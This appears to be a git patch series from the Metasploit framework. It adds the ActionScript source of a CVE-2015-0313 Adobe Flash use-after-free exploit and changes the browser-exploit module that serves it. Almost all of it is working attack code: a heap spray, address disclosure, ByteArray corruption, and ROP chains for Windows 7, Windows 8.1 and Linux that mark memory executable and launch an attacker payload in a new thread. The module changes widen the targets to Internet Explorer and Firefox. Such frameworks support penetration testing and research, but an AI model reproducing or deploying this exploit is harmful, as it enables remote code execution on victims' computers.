+        public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>):void
+        {
+            exploit = exp
+            payload = p
+            platform = pl
+            op_system = os
+
+            ev = new ExploitVector(uv)
+            if (!ev.is_ready()) return
+            eba = new ExploitByteArray(platform)
+            spray_objects()
+            try { pos = search_objects() } catch (err:Error) { ev.restore(); cleanup(); return; }
+            ev.set_own_address(pos)
+            if (!disclose_objects()) { ev.restore(); cleanup(); return; }
+            disclose_addresses()
+            corrupt_byte_array()
+            if (!eba.is_ready()) { ev.restore(); cleanup(); return }
+            do_rop()
+            restore_byte_array()
+            ev.restore()
+            cleanup()
+        }
+
+        private function spray_objects():void
+        {
+            Logger.log("[*] Exploiter - spray_objects()")
+            for (var i:uint = 0; i < spray.length; i++) 
+            {
+                spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
+                spray[i][0] = eba.ba
+                spray[i][1] = exploit 
+                spray[i][2] = stack
+                spray[i][3] = payload_space
+            } 
+        }
+        
+        private function search_objects():uint
+        {
+            Logger.log("[*] Exploiter - search_objects()")
+            var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0x8000)
+            return idx + 1
+        }
+
+        private function disclose_objects():Boolean
+        { 
+            Logger.log("[*] Exploiter - disclose_objects()")
+            byte_array_object = ev.at(pos) - 1
+            main = ev.at(pos + 1) - 1
+            stack_object = ev.at(pos + 2) - 1
+            payload_space_object = ev.at(pos + 3) - 1
+            if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
+                return false
+            }
+            return true
+        }
+
+        private function disclose_addresses():void
+        {
+            Logger.log("[*] Exploiter - disclose_addresses()")
+            if (platform == "linux") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x10)
+                buffer = ev.read(buffer_object + 0x1c)
+            }    
+            else if (platform == "win") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x40)
+                buffer = ev.read(buffer_object + 8)
+            }
+            vtable = ev.read(main)
+            stack_address = ev.read(stack_object + 0x18)
+            payload_address = ev.read(payload_space_object + 0x18)
+        }
+        
+        private function corrupt_byte_array():void
+        {
+            Logger.log("[*] Exploiter - corrupt_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c) // *array
+                ev.write(buffer_object + 0x20, 0xffffffff) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8) // *array
+                ev.write(buffer_object + 16, 0xffffffff) // capacity
+            }
+            eba.lets_ready()
+        }
+
+        private function restore_byte_array():void
+        { 
+            Logger.log("[*] Exploiter - restore_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c, buffer) // *array
+                ev.write(buffer_object + 0x20, 1024) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8, buffer) // *array
+                ev.write(buffer_object + 16, 1024) // capacity
+            }
+            eba.set_length(eba.original_length) 
+        }
+        
+        private function do_rop():void
+        {
+            Logger.log("[*] Exploiter - do_rop()")
+            if (platform == "linux") {
+                do_rop_linux()
+            } else if (platform == "win") {
+                if (op_system == "Windows 8.1") {
+                    do_rop_windows8()
+                } else if (op_system == "Windows 7") {
+                    do_rop_windows()
+                } else {
+                    return
+                }
+            } else {
+                return
+            }
+        }
+
+        private function do_rop_windows():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var kernel32:uint = pe.module("kernel32.dll", winmm)            
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
+            var createthread:uint = pe.procedure("CreateThread", kernel32)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+           
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_windows8():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows8()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var advapi32:uint = pe.module("advapi32.dll", flash)
+            var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
+            var kernel32:uint = pe.module("kernel32.dll", winmm) 
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
+            var createthread:uint = pe.procedure("CreateThread", kernelbase)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_linux():void
+        {
+            Logger.log("[*] Exploiter - do_rop_linux()")
+            var flash:Elf = new Elf(eba, vtable)
+            var feof:uint = flash.external_symbol('feof')
+            var libc:Elf = new Elf(eba, feof)
+            var popen:uint = libc.symbol("popen")
+            var mprotect:uint = libc.symbol("mprotect")
+            var mmap:uint = libc.symbol("mmap")
+            var clone:uint = libc.symbol("clone")
+            var xchgeaxespret:uint = flash.gadget("c394", 0x0000ffff)
+            var xchgeaxesiret:uint = flash.gadget("c396", 0x0000ffff)
+            var addesp2cret:uint = flash.gadget("c32cc483", 0xffffffff)
+
+            // Continuation of execution
+            // 1) Recover original vtable
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            // 2) Recover original stack
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi
+
+            // my_memcpy
+            eba.write(buffer + 0x60, "\x56", false) // push esi
+            eba.write(0, "\x57", false)             // push edi
+            eba.write(0, "\x51", false)             // push ecx
+            eba.write(0, "\x8B\x7C\x24\x10", false) // mov edi,[esp+0x10]
+            eba.write(0, "\x8B\x74\x24\x14", false) // mov esi,[esp+0x14]
+            eba.write(0, "\x8B\x4C\x24\x18", false) // mov ecx,[esp+0x18]
+            eba.write(0, "\xF3\xA4", false)         // rep movsb 
+            eba.write(0, "\x59", false)             // pop ecx
+            eba.write(0, "\x5f", false)             // pop edi
+            eba.write(0, "\x5e", false)             // pop esi
+            eba.write(0, "\xc3", false)             // ret
+
+            // Put the popen parameters in memory
+            eba.write(payload_address + 0x8, payload, true) // false
+           
+            // Put the fake stack/vtable on memory 
+            eba.write(stack_address + 0x18024, xchgeaxespret) // Initial gadget, stackpivot
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // Save original stack on esi
+            eba.write(0, addesp2cret) //second pivot to preserver stack_address + 0x18024
+
+            // Return to mprotect()
+            eba.write(stack_address + 0x18034, mprotect)
+            // Return to stackpivot (jmp over mprotect parameters)
+            eba.write(0, addesp2cret)
+            // mprotect() arguments
+            eba.write(0, buffer) // addr
+            eba.write(0, 0x1000) // size
+            eba.write(0, 0x7)    // PROT_READ | PROT_WRITE | PROT_EXEC
+
+            // Return to mmap()
+            eba.write(stack_address + 0x18068, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() code segment arguments
+            eba.write(0, 0x70000000) // 0x70000000
+            eba.write(0, 0x4000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, 0xffffffff) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to mmap()
+            eba.write(stack_address + 0x1809c, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() stack segment arguments
+            eba.write(0, 0x70008000) // NULL
+            eba.write(0, 0x10000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, -1) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to memcpy()
+            eba.write(stack_address + 0x180d0, buffer + 0x60)
+            // Return to stackpivot (jmp over memcpy parameters)
+            eba.write(0, addesp2cret)
+            // memcpy() parameters
+            eba.write(0, 0x70000000)
+            eba.write(0, payload_address + 0x8)
+            eba.write(0, payload.length)
+
+            // Return to clone()
+            eba.write(stack_address + 0x18104, clone)
+            // Return to CoE (fix stack and object vtable)
+            eba.write(0, buffer + 0x10)
+            // clone() arguments
+            eba.write(0, 0x70000000) // code
+            eba.write(0, 0x7000bff0) // stack
+            eba.write(0, 0x00000100) // flags CLONE_VM
+            eba.write(0, 0)          // args
+           
+            //call   DWORD PTR [eax+0x24]
+            //EAX: 0x41414141 ('AAAA')
+            //EDI: 0xad857088 ("AAAA\377")
+            eba.write(main, stack_address + 0x18000)
+            exploit.hasOwnProperty('msf')
+        }
+
+        private function cleanup():void
+        { 
+            Logger.log("[*] Exploiter - cleanup()")
+            spray = null
+            stack = null
+            payload_space = null
+            eba = null
+            ev = null
+            exploit = null
+            System.pauseForGCIfCollectionImminent(0)
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-0313/Logger.as b/external/source/exploits/CVE-2015-0313/Logger.as
new file mode 100644
index 0000000000..16c0447973
--- /dev/null
+++ b/external/source/exploits/CVE-2015-0313/Logger.as
@@ -0,0 +1,32 @@
+package 
+{
+    import flash.external.ExternalInterface
+
+    public class Logger {
+        private static const DEBUG:uint = 0
+ 
+        public static function alert(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("alert", str);
+            }
+        }
+
+        public static function log(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("console.log", str);
+            }
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-0313/PE.as b/external/source/exploits/CVE-2015-0313/PE.as
new file mode 100644
index 0000000000..8753586477
--- /dev/null
+++ b/external/source/exploits/CVE-2015-0313/PE.as
@@ -0,0 +1,72 @@
+package
+{
+    public class PE
+    {
+        private var eba:ExploitByteArray
+
+        public function PE(ba:ExploitByteArray)
+        {
+            eba = ba
+        }
+
+        public function base(addr:uint):uint
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (eba.read(addr) == 0x00905a4d) return addr
+                addr -= 0x10000
+            }
+            return 0
+        }
+
+        public function module(name:String, addr:uint):uint
+        {
+            var iat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x80), i:int = -1
+            var mod_name:String
+
+            while (true) {
+                var entry:uint = eba.read(iat + (++i) * 0x14 + 12)
+                if (!entry) throw new Error("FAIL!"); 
+                mod_name = eba.read_string(addr + entry, name.length)
+                if (mod_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return base(eba.read(addr + eba.read(iat + i * 0x14 + 16)))
+        }
+
+        public function procedure(name:String, addr:uint):uint
+        {
+            var eat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x78)
+            var numberOfNames:uint = eba.read(eat + 0x18)
+            var addressOfFunctions:uint = addr + eba.read(eat + 0x1c)
+            var addressOfNames:uint = addr + eba.read(eat + 0x20)
+            var addressOfNameOrdinals:uint = addr + eba.read(eat + 0x24)
+            var proc_name:String
+
+            for (var i:uint = 0; ; i++) {
+                var entry:uint = eba.read(addressOfNames + i * 4)
+                proc_name = eba.read_string(addr + entry, name.length + 2)
+                if (proc_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return addr + eba.read(addressOfFunctions + eba.read(addressOfNameOrdinals + i * 2, "word") * 4)
+        }
+
+        public function gadget(gadget:String, hint:uint, addr:uint):uint
+        {
+            var find:uint = 0
+            var contents:uint = 0
+            var limit:uint = eba.read(addr + eba.read(addr + 0x3c) + 0x50)
+            var value:uint = parseInt(gadget, 16)
+
+            for (var i:uint = 0; i < limit - 4; i++) {
+                contents = eba.read(addr + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return addr + i
+                }
+                if (hint != 0xffffffff && value == (contents & hint)) {
+                    return addr + i
+                }
+            }
+            throw new Error()
+        }
+    }
+}
diff --git a/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb b/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb
index 7661bef86b..c6c5b35ef6 100644
--- a/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb
+++ b/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb
@@ -6,9 +6,8 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = GreatRanking
 
-  include Msf::Exploit::Powershell
   include Msf::Exploit::Remote::BrowserExploitServer
 
   def initialize(info={})
@@ -43,9 +42,12 @@ class Metasploit3 < Msf::Exploit::Remote
       'BrowserRequirements' =>
         {
           :source  => /script|headers/i,
-          :os_name => OperatingSystems::Match::WINDOWS_7,
-          :ua_name => Msf::HttpClients::IE,
-          :flash   => lambda { |ver| ver =~ /^16\./ && ver == '16.0.0.296' },
+          :os_name => lambda do |os|
+            os =~ OperatingSystems::Match::WINDOWS_7 ||
+              os =~ OperatingSystems::Match::WINDOWS_81
+          end,
+          :ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) },
+          :flash   => lambda { |ver| ver =~ /^16\./},# && Gem::Version.new(ver) == Gem::Version.new('16.0.0.296') },
           :arch    => ARCH_X86
         },
       'Targets'             =>
@@ -78,17 +80,18 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit_template(cli, target_info)
     swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
     target_payload = get_payload(cli, target_info)
-    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
-    b64_payload = Rex::Text.encode_base64(psh_payload)
+    b64_payload = Rex::Text.encode_base64(target_payload)
+    platform_id = 'win'
+    os_name = target_info[:os_name]
 
     html_template = %Q|<html>
     <body>
     <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
     <param name="movie" value="<%=swf_random%>" />
     <param name="allowScriptAccess" value="always" />
-    <param name="FlashVars" value="sh=<%=b64_payload%>" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
     <param name="Play" value="true" />
-    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
     </object>
     </body>
     </html>

From fb531d0069d22bc373c29ba0d168f98d759385fe Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 10 Jun 2015 09:38:00 -0500
Subject: [PATCH 0382/1013] Update version coverage

---
 .../windows/browser/adobe_flash_worker_byte_array_uaf.rb        | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb b/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb
index c6c5b35ef6..5575afab8c 100644
--- a/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb
+++ b/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb
@@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
               os =~ OperatingSystems::Match::WINDOWS_81
           end,
           :ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) },
-          :flash   => lambda { |ver| ver =~ /^16\./},# && Gem::Version.new(ver) == Gem::Version.new('16.0.0.296') },
+          :flash   => lambda { |ver| ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.296') },
           :arch    => ARCH_X86
         },
       'Targets'             =>

From 2b4fe96cfdbe5a90d3e63c420e762974529568b6 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 10 Jun 2015 10:55:50 -0500
Subject: [PATCH 0383/1013] Tweak Heap Spray

---
 data/exploits/CVE-2015-0313/msf.swf           | Bin 20971 -> 21149 bytes
 .../source/exploits/CVE-2015-0313/Exploit.as  |  17 +++++++++++++++--
 .../exploits/CVE-2015-0313/Exploiter.as       |   2 +-
 .../source/exploits/CVE-2015-0313/Logger.as   |   2 +-
 4 files changed, 17 insertions(+), 4 deletions(-)
 mode change 100755 => 100644 data/exploits/CVE-2015-0313/msf.swf

diff --git a/data/exploits/CVE-2015-0313/msf.swf b/data/exploits/CVE-2015-0313/msf.swf
old mode 100755
new mode 100644
index 065aebeb0ce44ab1cd5eb783022d813fd2ef5f59..fafeb047efe5791b6bcfecb2d58d7a9613dab1e1
GIT binary patch
delta 21033
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
